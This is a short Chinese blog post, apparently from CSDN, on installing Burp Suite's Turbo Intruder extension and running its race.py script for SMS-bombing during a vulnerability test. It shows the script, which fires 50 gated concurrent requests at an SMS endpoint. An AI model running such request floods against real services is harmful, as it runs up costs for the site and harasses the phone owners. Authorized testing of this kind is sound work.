burp插件高并发模块turbo-intruder

本文介绍了如何在BurpSuite中安装TurboIntruder插件,并利用其RequestEngine模块进行短信轰炸测试。步骤包括手动安装jar包、设置并发连接和请求次数,以及使用Python脚本race.py执行攻击。
摘要由CSDN通过智能技术生成

工作需要测试某系统存在的某个漏洞,需要用到高并发模块进行短信轰炸,又get到一个插件使用,冲鸭

一、安装

百度搜索上好多人提供的方法是从burp自带的“商店”中安装插件,但是我的burp就不配合我
在这里插入图片描述迫于无奈只能手动啦,他给出了github链接:https://github.com/portswigger/turbo-intruder
在这里插入图片描述下载jar包,再回到burp
在这里插入图片描述添加jar包路径就可以啦
在这里插入图片描述

二使用

很简单,抓包,右击在这里插入图片描述如下图,上面请求包(爆破要添加%s,没有需求可以加在任意位置),下面 python 代码(不同脚本不同情境)选择适合自己的在这里插入图片描述我要短信爆破,请求包在 Host 下方输入:x-req: %s,python代码选的是 race.py ,就是下面这个

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=50,
                           requestsPerConnection=100,
                           pipeline=False
                           )

    # the 'gate' argument blocks the final byte of each request until openGate is invoked('gate'参数阻塞每个请求的最后一个字节,直到openGate被调用)
    for i in range(50):
        engine.queue(target.req, target.baseInput, gate='race1')

    # wait until every 'race1' tagged request is ready(等待直到每个'race1'标记的请求就绪)
    # then send the final byte of each request(然后发送每个请求的最后一个字节)
    # (this method is non-blocking, just like queue)(这个方法是非阻塞的,就像队列一样)
    engine.openGate('race1')

    engine.complete(timeout=60)

def handleResponse(req, interesting):
    table.add(req)

之后进行攻击即可
攻击结果保密原则就不截图啦
bye

  • 13
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值